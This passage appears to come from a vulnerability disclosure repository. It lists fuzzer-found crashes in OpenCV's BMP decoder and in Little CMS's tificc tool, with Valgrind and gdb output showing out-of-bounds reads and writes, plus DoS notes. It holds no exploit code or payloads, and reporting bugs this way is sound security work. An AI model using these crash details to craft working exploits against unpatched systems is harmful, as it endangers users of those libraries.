Segmentation fault 339 | 340 | ``` 341 | 342 | # 7. out of bound write in FillUniColor 343 | ``` 344 | ==10897== Memcheck, a memory error detector 345 | ==10897== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. 346 | ==10897== Using Valgrind-3.10.1 and LibVEX; rerun with -h for copyright info 347 | ==10897== Command: ./opencv_test.elf ../../../fuzz-tests/medianBlur-test/out/crashes/id:000032,sig:06,src:000516,op:flip1,pos:21 348 | ==10897== 349 | ==10897== Warning: set address range perms: large range [0x3a044040, 0xfa0459a8) (undefined) 350 | ==10897== Invalid write of size 1 351 | ==10897== at 0x514C749: FillUniColor(unsigned char*, unsigned char*&, int, int, int&, int, int, PaletteEntry) (utils.cpp:417) 352 | ==10897== by 0x5169824: cv::BmpDecoder::readData(cv::Mat&) (grfmt_bmp.cpp:315) 353 | ==10897== by 0x5134A8B: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:454) 354 | ==10897== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 355 | ==10897== by 0x400D90: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/MedianBlur-test/opencv_test.elf) 356 | ==10897== Address 0xfffffffff40458d7 is not stack'd, malloc'd or (recently) free'd 357 | ==10897== 358 | ==10897== 359 | ==10897== Process terminating with default action of signal 11 (SIGSEGV) 360 | ==10897== Access not within mapped region at address 0xFFFFFFFFF40458D7 361 | ==10897== at 0x514C749: FillUniColor(unsigned char*, unsigned char*&, int, int, int&, int, int, PaletteEntry) (utils.cpp:417) 362 | ==10897== by 0x5169824: cv::BmpDecoder::readData(cv::Mat&) (grfmt_bmp.cpp:315) 363 | ==10897== by 0x5134A8B: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:454) 364 | ==10897== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 365 | ==10897== by 0x400D90: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/MedianBlur-test/opencv_test.elf) 366 | ==10897== If you believe this happened as a result of a stack 367 | ==10897== overflow in your program's main thread (unlikely but 368 | ==10897== possible), you can try to increase the size of the 369 | ==10897== main thread stack using the --main-stacksize= flag. 370 | ==10897== The main thread stack size used in this run was 8388608. 371 | ==10897== 372 | ==10897== HEAP SUMMARY: 373 | ==10897== in use at exit: 3,238,106,882 bytes in 397 blocks 374 | ==10897== total heap usage: 458 allocs, 61 frees, 3,238,116,890 bytes allocated 375 | ==10897== 376 | ==10897== LEAK SUMMARY: 377 | ==10897== definitely lost: 0 bytes in 0 blocks 378 | ==10897== indirectly lost: 0 bytes in 0 blocks 379 | ==10897== possibly lost: 3,221,240,139 bytes in 114 blocks 380 | ==10897== still reachable: 16,866,743 bytes in 283 blocks 381 | ==10897== suppressed: 0 bytes in 0 blocks 382 | ==10897== Rerun with --leak-check=full to see details of leaked memory 383 | ==10897== 384 | ==10897== For counts of detected and suppressed errors, rerun with: -v 385 | ==10897== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) 386 | Segmentation fault 387 | 388 | ``` 389 | 390 | 391 | # 8. Invalid read in fread 392 | ``` 393 | ==4831== by 0x51683B8: cv::BmpDecoder::readHeader() (grfmt_bmp.cpp:122) 394 | [----------------------------------registers-----------------------------------] 395 | RAX: 0x7ffff54a0210 (<__GI__IO_file_xsgetn>: push r14) 396 | RBX: 0x61d5b0 --> 0xc00002574442 397 | RCX: 0xfffffff9 398 | RDX: 0x28 ('(') 399 | RSI: 0x7ffff7ff3fd1 400 | RDI: 0x6155a0 --> 0xc00002574d42 401 | RBP: 0x2f ('/') 402 | RSP: 0x7fffffffdbc8 --> 0x7ffff54a038e (<__GI__IO_file_xsgetn+382>: add QWORD PTR [rbx+0x8],rbp) 403 | RIP: 0x7ffff54b3ab0 (<__mempcpy_sse2+144>: movzx eax,BYTE PTR [rsi]) 404 | R8 : 0x61d690 --> 0x100000001 405 | R9 : 0x6155a0 --> 0xc00002574d42 406 | R10: 0x0 407 | R11: 0x246 408 | R12: 0x7fd1 409 | R13: 0x8000 410 | R14: 0x6155a0 --> 0xc00002574d42 411 | R15: 0x0 412 | EFLAGS: 0x10297 (CARRY PARITY ADJUST zero SIGN trap INTERRUPT direction overflow) 413 | [-------------------------------------code-------------------------------------] 414 | 0x7ffff54b3aa7 <__mempcpy_sse2+135>: lea rdx,[rcx+rdx*1-0x8] 415 | 0x7ffff54b3aac <__mempcpy_sse2+140>: sub ecx,0x8 416 | 0x7ffff54b3aaf <__mempcpy_sse2+143>: nop 417 | => 0x7ffff54b3ab0 <__mempcpy_sse2+144>: movzx eax,BYTE PTR [rsi] 418 | 0x7ffff54b3ab3 <__mempcpy_sse2+147>: mov BYTE PTR [rdi],al 419 | 0x7ffff54b3ab5 <__mempcpy_sse2+149>: inc ecx 420 | 0x7ffff54b3ab7 <__mempcpy_sse2+151>: lea rsi,[rsi+0x1] 421 | 0x7ffff54b3abb <__mempcpy_sse2+155>: lea rdi,[rdi+0x1] 422 | [------------------------------------stack-------------------------------------] 423 | 0000| 0x7fffffffdbc8 --> 0x7ffff54a038e (<__GI__IO_file_xsgetn+382>: add QWORD PTR [rbx+0x8],rbp) 424 | 0008| 0x7fffffffdbd0 --> 0x61d5b0 --> 0xc00002574442 425 | 0016| 0x7fffffffdbd8 --> 0x8000 426 | 0024| 0x7fffffffdbe0 --> 0x1 427 | 0032| 0x7fffffffdbe8 --> 0x8000 428 | 0040| 0x7fffffffdbf0 --> 0x0 429 | 0048| 0x7fffffffdbf8 --> 0x7ffff549586f (<__GI__IO_fread+143>: test DWORD PTR [rbx],0x8000) 430 | 0056| 0x7fffffffdc00 --> 0x0 431 | [------------------------------------------------------------------------------] 432 | Legend: code, data, rodata, value 433 | Stopped reason: SIGSEGV 434 | __mempcpy_sse2 () at ../sysdeps/x86_64/memcpy.S:166 435 | 166 ../sysdeps/x86_64/memcpy.S: No such file or directory. 436 | gdb-peda$ bt 437 | #0 __mempcpy_sse2 () at ../sysdeps/x86_64/memcpy.S:166 438 | #1 0x00007ffff54a038e in __GI__IO_file_xsgetn (fp=0x61d5b0, data=, n=0x8000) at fileops.c:1396 439 | #2 0x00007ffff549586f in __GI__IO_fread (buf=, size=0x1, count=0x8000, fp=0x61d5b0) at iofread.c:42 440 | #3 0x00007ffff764c4e3 in cv::RBaseStream::readBlock (this=0x615140) at /data/xqx/tests/opencv-test/opencv/modules/imgcodecs/src/bitstrm.cpp:105 441 | #4 0x00007ffff764cf9f in cv::RLByteStream::getBytes (this=0x615140, buffer=0x615180, count=0x5d34843e) at /data/xqx/tests/opencv-test/opencv/modules/imgcodecs/src/bitstrm.cpp:233 442 | #5 0x00007ffff763c3b9 in cv::BmpDecoder::readHeader (this=0x6150a0) at /data/xqx/tests/opencv-test/opencv/modules/imgcodecs/src/grfmt_bmp.cpp:122 443 | #6 0x00007ffff7608549 in cv::imread_ (filename=..., flags=0x1, hdrtype=0x2, mat=0x7fffffffe240) at /data/xqx/tests/opencv-test/opencv/modules/imgcodecs/src/loadsave.cpp:412 444 | #7 0x00007ffff7609742 in cv::imread (filename=..., flags=0x1) at /data/xqx/tests/opencv-test/opencv/modules/imgcodecs/src/loadsave.cpp:565 445 | #8 0x0000000000400d91 in main () 446 | #9 0x00007ffff5448f45 in __libc_start_main (main=0x400d2d
, argc=0x2, argv=0x7fffffffe3f8, init=, fini=, rtld_fini=, stack_end=0x7fffffffe3e8) at libc-start.c:287 447 | #10 0x0000000000400c69 in _start () 448 | 449 | ``` 450 | 451 | ``` 452 | ==4831== Memcheck, a memory error detector 453 | ==4831== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. 454 | ==4831== Using Valgrind-3.10.1 and LibVEX; rerun with -h for copyright info 455 | ==4831== Command: ./opencv_test.elf ../../../fuzz-tests/medianBlur-test/out/crashes/id:000040,sig:06,src:000820,op:havoc,rep:4 456 | ==4831== 457 | ==4831== Invalid write of size 2 458 | ==4831== at 0x4C2F7E3: memcpy@@GLIBC_2.14 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) 459 | ==4831== by 0x5178F29: cv::RLByteStream::getBytes(void*, int) (bitstrm.cpp:235) 460 | ==4831== by 0x51683B8: cv::BmpDecoder::readHeader() (grfmt_bmp.cpp:122) 461 | ==4831== by 0x5134548: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:412) 462 | ==4831== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 463 | ==4831== by 0x400D90: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/MedianBlur-test/opencv_test.elf) 464 | ==4831== Address 0xecb66c0 is 0 bytes after a block of size 1,264 alloc'd 465 | ==4831== at 0x4C2B0E0: operator new(unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) 466 | ==4831== by 0x513AD5C: cv::Ptr cv::makePtr() (ptr.inl.hpp:301) 467 | ==4831== by 0x5167CE3: cv::BmpDecoder::newDecoder() const (grfmt_bmp.cpp:76) 468 | ==4831== by 0x51322DB: cv::findDecoder(cv::String const&) (loadsave.cpp:199) 469 | ==4831== by 0x5134301: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:384) 470 | ==4831== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 471 | ==4831== by 0x400D90: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/MedianBlur-test/opencv_test.elf) 472 | ==4831== 473 | ==4831== Invalid write of size 1 474 | ==4831== at 0x4C2F953: memcpy@@GLIBC_2.14 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) 475 | ==4831== by 0x5178F29: cv::RLByteStream::getBytes(void*, int) (bitstrm.cpp:235) 476 | ==4831== by 0x51683B8: cv::BmpDecoder::readHeader() (grfmt_bmp.cpp:122) 477 | ==4831== by 0x5134548: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:412) 478 | ==4831== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 479 | ==4831== by 0x400D90: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/MedianBlur-test/opencv_test.elf) 480 | ==4831== Address 0xecb66e8 is 24 bytes before a block of size 80 alloc'd 481 | ==4831== at 0x4C2AB80: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) 482 | ==4831== by 0x68EE88D: cv::fastMalloc(unsigned long) (alloc.cpp:64) 483 | ==4831== by 0x69FE8A7: cv::String::allocate(unsigned long) (stl.cpp:50) 484 | ==4831== by 0x4E4AB37: cv::String::operator=(char const*) (cvstd.hpp:668) 485 | ==4831== by 0x5167A45: cv::BmpDecoder::BmpDecoder() (grfmt_bmp.cpp:55) 486 | ==4831== by 0x513AD79: cv::Ptr cv::makePtr() (ptr.inl.hpp:301) 487 | ==4831== by 0x5167CE3: cv::BmpDecoder::newDecoder() const (grfmt_bmp.cpp:76) 488 | ==4831== by 0x51322DB: cv::findDecoder(cv::String const&) (loadsave.cpp:199) 489 | ==4831== by 0x5134301: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:384) 490 | ==4831== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 491 | ==4831== by 0x400D90: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/MedianBlur-test/opencv_test.elf) 492 | ==4831== 493 | ==4831== Source and destination overlap in memcpy(0xecb67d4, 0xecb67f0, 47) 494 | ==4831== at 0x4C2F71C: memcpy@@GLIBC_2.14 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) 495 | ==4831== by 0x5178F29: cv::RLByteStream::getBytes(void*, int) (bitstrm.cpp:235) 496 | ==4831== by 0x51683B8: cv::BmpDecoder::readHeader() (grfmt_bmp.cpp:122) 497 | ==4831== by 0x5134548: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:412) 498 | ==4831== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 499 | ==4831== by 0x400D90: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/MedianBlur-test/opencv_test.elf) 500 | ==4831== 501 | nvalid read of size 1 502 | ==4831== at 0x74ADAB0: __GI_mempcpy (memcpy.S:166) 503 | ==4831== by 0x749A38D: _IO_file_xsgetn (fileops.c:1396) 504 | ==4831== by 0x748F86E: fread (iofread.c:42) 505 | ==4831== by 0x51784E2: cv::RBaseStream::readBlock() (bitstrm.cpp:105) 506 | ==4831== by 0x5178F9E: cv::RLByteStream::getBytes(void*, int) (bitstrm.cpp:233) 507 | ==4831== by 0x51683B8: cv::BmpDecoder::readHeader() (grfmt_bmp.cpp:122) 508 | ==4831== by 0x5134548: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:412) 509 | ==4831== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 510 | ==4831== by 0x400D90: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/MedianBlur-test/opencv_test.elf) 511 | ==4831== Address 0x200040000ffffd1 is not stack'd, malloc'd or (recently) free'd 512 | ==4831== 513 | ==4831== 514 | ==4831== Process terminating with default action of signal 11 (SIGSEGV) 515 | ==4831== General Protection Fault 516 | ==4831== at 0x74ADAB0: __GI_mempcpy (memcpy.S:166) 517 | ==4831== by 0x749A38D: _IO_file_xsgetn (fileops.c:1396) 518 | ==4831== by 0x748F86E: fread (iofread.c:42) 519 | ==4831== by 0x51784E2: cv::RBaseStream::readBlock() (bitstrm.cpp:105) 520 | ==4831== by 0x5178F9E: cv::RLByteStream::getBytes(void*, int) (bitstrm.cpp:233) 521 | ==4831== by 0x51683B8: cv::BmpDecoder::readHeader() (grfmt_bmp.cpp:122) 522 | ==4831== by 0x5134548: cv::imread_(cv::String const&, int, int, cv::Mat*) (loadsave.cpp:412) 523 | ==4831== by 0x5135741: cv::imread(cv::String const&, int) (loadsave.cpp:565) 524 | ==4831== by 0x400D90: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/MedianBlur-test/opencv_test.elf) 525 | ==4831== 526 | ==4831== HEAP SUMMARY: 527 | ==4831== in use at exit: 97,526 bytes in 393 blocks 528 | ==4831== total heap usage: 454 allocs, 61 frees, 107,534 bytes allocated 529 | ==4831== 530 | ==4831== LEAK SUMMARY: 531 | ==4831== definitely lost: 0 bytes in 0 blocks 532 | ==4831== indirectly lost: 0 bytes in 0 blocks 533 | ==4831== possibly lost: 8,163 bytes in 113 blocks 534 | ==4831== still reachable: 89,363 bytes in 280 blocks 535 | ==4831== suppressed: 0 bytes in 0 blocks 536 | ==4831== Rerun with --leak-check=full to see details of leaked memory 537 | ==4831== 538 | ==4831== For counts of detected and suppressed errors, rerun with: -v 539 | ==4831== ERROR SUMMARY: 259 errors from 4 contexts (suppressed: 0 from 0) 540 | Segmentation fault 541 | 542 | ``` 543 | 544 | # 9. Invalid write in icvCvt_BGRA2BGR_8u_C4C3R 545 | 546 | ``` 547 | ==2971== Memcheck, a memory error detector 548 | ==2971== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. 549 | ==2971== Using Valgrind-3.10.1 and LibVEX; rerun with -h for copyright info 550 | ==2971== Command: ../../../../OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/GaussianBlur-test/opencv_test.elf id:000038,sig:06,src:000475,op:flip1,pos:21 551 | ==2971== 552 | ==2971== Warning: set address range perms: large range [0x3a044040, 0x1ba074088) (undefined) 553 | ==2971== Invalid read of size 1 554 | ==2971== at 0x506A270: icvCvt_BGRA2BGR_8u_C4C3R(unsigned char const*, int, unsigned char*, int, CvSize, int) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 555 | ==2971== by 0x507D7A8: cv::BmpDecoder::readData(cv::Mat&) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 556 | ==2971== by 0x5062D67: cv::imread_(cv::String const&, int, int, cv::Mat*) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 557 | ==2971== by 0x5063204: cv::imread(cv::String const&, int) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 558 | ==2971== by 0x400DFA: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/GaussianBlur-test/opencv_test.elf) 559 | ==2971== Address 0xdf05b91 is 1 bytes after a block of size 16,416 alloc'd 560 | ==2971== at 0x4C2B800: operator new[](unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) 561 | ==2971== by 0x507DD8C: cv::BmpDecoder::readData(cv::Mat&) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 562 | ==2971== by 0x5062D67: cv::imread_(cv::String const&, int, int, cv::Mat*) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 563 | ==2971== by 0x5063204: cv::imread(cv::String const&, int) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 564 | ==2971== by 0x400DFA: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/GaussianBlur-test/opencv_test.elf) 565 | ==2971== 566 | ==2971== Invalid read of size 1 567 | ==2971== at 0x506A276: icvCvt_BGRA2BGR_8u_C4C3R(unsigned char const*, int, unsigned char*, int, CvSize, int) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 568 | ==2971== by 0x507D7A8: cv::BmpDecoder::readData(cv::Mat&) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 569 | ==2971== by 0x5062D67: cv::imread_(cv::String const&, int, int, cv::Mat*) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 570 | ==2971== by 0x5063204: cv::imread(cv::String const&, int) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 571 | ==2971== by 0x400DFA: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/GaussianBlur-test/opencv_test.elf) 572 | ==2971== Address 0xdf05b90 is 0 bytes after a block of size 16,416 alloc'd 573 | ==2971== at 0x4C2B800: operator new[](unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) 574 | ==2971== by 0x507DD8C: cv::BmpDecoder::readData(cv::Mat&) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 575 | ==2971== by 0x5062D67: cv::imread_(cv::String const&, int, int, cv::Mat*) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 576 | ==2971== by 0x5063204: cv::imread(cv::String const&, int) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 577 | ==2971== by 0x400DFA: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/GaussianBlur-test/opencv_test.elf) 578 | ==2971== 579 | ==2971== Invalid read of size 1 580 | ==2971== at 0x506A290: icvCvt_BGRA2BGR_8u_C4C3R(unsigned char const*, int, unsigned char*, int, CvSize, int) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 581 | ==2971== by 0x507D7A8: cv::BmpDecoder::readData(cv::Mat&) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 582 | ==2971== by 0x5062D67: cv::imread_(cv::String const&, int, int, cv::Mat*) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 583 | ==2971== by 0x5063204: cv::imread(cv::String const&, int) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 584 | ==2971== by 0x400DFA: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/GaussianBlur-test/opencv_test.elf) 585 | ==2971== Address 0xdf05b92 is 2 bytes after a block of size 16,416 alloc'd 586 | ==2971== at 0x4C2B800: operator new[](unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) 587 | ==2971== by 0x507DD8C: cv::BmpDecoder::readData(cv::Mat&) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 588 | ==2971== by 0x5062D67: cv::imread_(cv::String const&, int, int, cv::Mat*) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 589 | ==2971== by 0x5063204: cv::imread(cv::String const&, int) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 590 | ==2971== by 0x400DFA: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/GaussianBlur-test/opencv_test.elf) 591 | ==2971== 592 | ==2971== 593 | ==2971== Process terminating with default action of signal 11 (SIGSEGV) 594 | ==2971== Access not within mapped region at address 0xE2E0001 595 | ==2971== at 0x506A270: icvCvt_BGRA2BGR_8u_C4C3R(unsigned char const*, int, unsigned char*, int, CvSize, int) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 596 | ==2971== by 0x507D7A8: cv::BmpDecoder::readData(cv::Mat&) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 597 | ==2971== by 0x5062D67: cv::imread_(cv::String const&, int, int, cv::Mat*) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 598 | ==2971== by 0x5063204: cv::imread(cv::String const&, int) (in /data/xqx/tests/opencv-test/build/install/lib/libopencv_imgcodecs.so.3.3.0) 599 | ==2971== by 0x400DFA: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/GaussianBlur-test/opencv_test.elf) 600 | ==2971== If you believe this happened as a result of a stack 601 | ==2971== overflow in your program's main thread (unlikely but 602 | ==2971== possible), you can try to increase the size of the 603 | ==2971== main thread stack using the --main-stacksize= flag. 604 | ==2971== The main thread stack size used in this run was 8388608. 605 | ==2971== 606 | ==2971== HEAP SUMMARY: 607 | ==2971== in use at exit: 6,442,761,614 bytes in 397 blocks 608 | ==2971== total heap usage: 458 allocs, 61 frees, 6,442,771,622 bytes allocated 609 | ==2971== 610 | ==2971== LEAK SUMMARY: 611 | ==2971== definitely lost: 0 bytes in 0 blocks 612 | ==2971== indirectly lost: 0 bytes in 0 blocks 613 | ==2971== possibly lost: 6,442,655,739 bytes in 114 blocks 614 | ==2971== still reachable: 105,875 bytes in 283 blocks 615 | ==2971== suppressed: 0 bytes in 0 blocks 616 | ==2971== Rerun with --leak-check=full to see details of leaked memory 617 | ==2971== 618 | ==2971== For counts of detected and suppressed errors, rerun with: -v 619 | ==2971== ERROR SUMMARY: 3029845 errors from 3 contexts (suppressed: 0 from 0) 620 | Segmentation fault 621 | 622 | ``` 623 | ![](./pics/bug8.PNG) 624 | 625 | 626 | # 10. DOS (CPU exhaust ) 627 | 628 | the bug results cpu exhaust for a long time. 629 | 630 | # 11. DOS (memory exhaust) 631 | 632 | This bug results to memory exhaust. 633 | 634 | ![](./pics/dos.PNG) 635 | 636 | 637 | # 12. out-of-bound write in FillColorRow1 638 | 639 | ``` 640 | ==16048== Memcheck, a memory error detector 641 | ==16048== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. 642 | ==16048== Using Valgrind-3.10.1 and LibVEX; rerun with -h for copyright info 643 | ==16048== Command: ./opencv_test.elf ./12-opencv-outbound-write-FillColorRow1 644 | ==16048== 645 | ==16048== Warning: set address range perms: large range [0x3a044080, 0xccce9780) (undefined) 646 | ==16048== Invalid write of size 4 647 | ==16048== at 0x50AD680: FillColorRow1(unsigned char*, unsigned char*, int, PaletteEntry*) (in /data/xqx/tests/opencv-test/build-20170822/install/lib/libopencv_imgcodecs.so.3.3.0) 648 | ==16048== by 0x50BCB10: cv::BmpDecoder::readData(cv::Mat&) (in /data/xqx/tests/opencv-test/build-20170822/install/lib/libopencv_imgcodecs.so.3.3.0) 649 | ==16048== by 0x50A384C: cv::imread_(cv::String const&, int, int, cv::Mat*) (in /data/xqx/tests/opencv-test/build-20170822/install/lib/libopencv_imgcodecs.so.3.3.0) 650 | ==16048== by 0x50A3DB4: cv::imread(cv::String const&, int) (in /data/xqx/tests/opencv-test/build-20170822/install/lib/libopencv_imgcodecs.so.3.3.0) 651 | ==16048== by 0x400DFA: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/GaussianBlur-test/opencv_test.elf) 652 | ==16048== Address 0xffffffffccce04c8 is not stack'd, malloc'd or (recently) free'd 653 | ==16048== 654 | ==16048== 655 | ==16048== Process terminating with default action of signal 11 (SIGSEGV) 656 | ==16048== Access not within mapped region at address 0xFFFFFFFFCCCE04C8 657 | ==16048== at 0x50AD680: FillColorRow1(unsigned char*, unsigned char*, int, PaletteEntry*) (in /data/xqx/tests/opencv-test/build-20170822/install/lib/libopencv_imgcodecs.so.3.3.0) 658 | ==16048== by 0x50BCB10: cv::BmpDecoder::readData(cv::Mat&) (in /data/xqx/tests/opencv-test/build-20170822/install/lib/libopencv_imgcodecs.so.3.3.0) 659 | ==16048== by 0x50A384C: cv::imread_(cv::String const&, int, int, cv::Mat*) (in /data/xqx/tests/opencv-test/build-20170822/install/lib/libopencv_imgcodecs.so.3.3.0) 660 | ==16048== by 0x50A3DB4: cv::imread(cv::String const&, int) (in /data/xqx/tests/opencv-test/build-20170822/install/lib/libopencv_imgcodecs.so.3.3.0) 661 | ==16048== by 0x400DFA: main (in /data/xqx/tests/opencv-test/OpenCV3-Intro-Book-Src/Linux-OpenCV3-examples/GaussianBlur-test/opencv_test.elf) 662 | ==16048== If you believe this happened as a result of a stack 663 | ==16048== overflow in your program's main thread (unlikely but 664 | ==16048== possible), you can try to increase the size of the 665 | ==16048== main thread stack using the --main-stacksize= flag. 666 | ==16048== The main thread stack size used in this run was 8388608. 667 | ==16048== 668 | ==16048== HEAP SUMMARY: 669 | ==16048== in use at exit: 2,462,831,174 bytes in 397 blocks 670 | ==16048== total heap usage: 458 allocs, 61 frees, 2,462,840,750 bytes allocated 671 | ==16048== 672 | ==16048== LEAK SUMMARY: 673 | ==16048== definitely lost: 0 bytes in 0 blocks 674 | ==16048== indirectly lost: 0 bytes in 0 blocks 675 | ==16048== possibly lost: 5,324 bytes in 105 blocks 676 | ==16048== still reachable: 2,462,825,850 bytes in 292 blocks 677 | ==16048== suppressed: 0 bytes in 0 blocks 678 | ==16048== Rerun with --leak-check=full to see details of leaked memory 679 | ==16048== 680 | ==16048== For counts of detected and suppressed errors, rerun with: -v 681 | ==16048== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) 682 | Segmentation fault 683 | 684 | 685 | ``` 686 | 687 | # 13. DOS, exhaust CPU for 10 hours. 688 | 689 | a new DOS testcase in opencv after a patch in 20170823, 690 | it could exhaust cpu for more than 10 hours. 691 | 692 | 693 | 694 | ![](./pics/dos-10h.PNG) 695 | -------------------------------------------------------------------------------- /cms/readme.md: -------------------------------------------------------------------------------- 1 | POC of CMS 2 | ===================== 3 | 4 | 5 | 6 | 7 | ## 1-cms-out-bound-write-PrecalculateXFORM 8 | 9 | 10 | ``` 11 | 12 | gdb --args tificc $POC /tmp/out.tiff 13 | 14 | Program received signal SIGSEGV, Segmentation fault. 15 | [------------------------------------stack-------------------------------------] 16 | 0000| 0x7fffffffe838 --> 0x7ffff7b21c2c (: mov r11,QWORD PTR [rbx+0x70]) 17 | 0008| 0x7fffffffe840 --> 0x3c95700000000000 18 | 0016| 0x7fffffffe848 --> 0x102000000b10 19 | 0024| 0x7fffffffe850 --> 0x0 20 | 0032| 0x7fffffffe858 --> 0x62e610 --> 0x4000200010000 21 | 0040| 0x7fffffffe860 --> 0x614820 --> 0x0 22 | 0048| 0x7fffffffe868 --> 0x100000000 23 | 0056| 0x7fffffffe870 --> 0x0 24 | [------------------------------------------------------------------------------] 25 | Legend: code, data, rodata, value 26 | Stopped reason: SIGSEGV 27 | 0x00007ffff7000000 in ?? () 28 | #0 0x00007ffff7000000 in ?? () 29 | #1 0x00007ffff7b21c2c in PrecalculatedXFORM (p=0x616940, in=0x62e610, out=0x614820, PixelsPerLine=0x1020, LineCount=0x1, Stride=0x7fffffffe900) at ../../cms/src/cmsxform.c:410 30 | #2 0x00007ffff7b25285 in cmsDoTransform (Transform=Transform@entry=0x616940, InputBuffer=InputBuffer@entry=0x62e610, OutputBuffer=OutputBuffer@entry=0x614820, Size=Size@entry=0x1020) at ../. 31 | ./cms/src/cmsxform.c:189 32 | #3 0x0000000000405ac7 in TileBasedXform (nPlanes=0x1, out=0x6124d0, in=, hXForm=0x616940) at ../../../cms/utils/tificc/tificc.c:408 33 | #4 TransformImage (cDefInpProf=, out=, in=) at ../../../cms/utils/tificc/tificc.c:904 34 | #5 main (argc=argc@entry=0x3, argv=argv@entry=0x7fffffffeba8) at ../../../cms/utils/tificc/tificc.c:1167 35 | #6 0x00007ffff71fe830 in __libc_start_main (main=0x402360
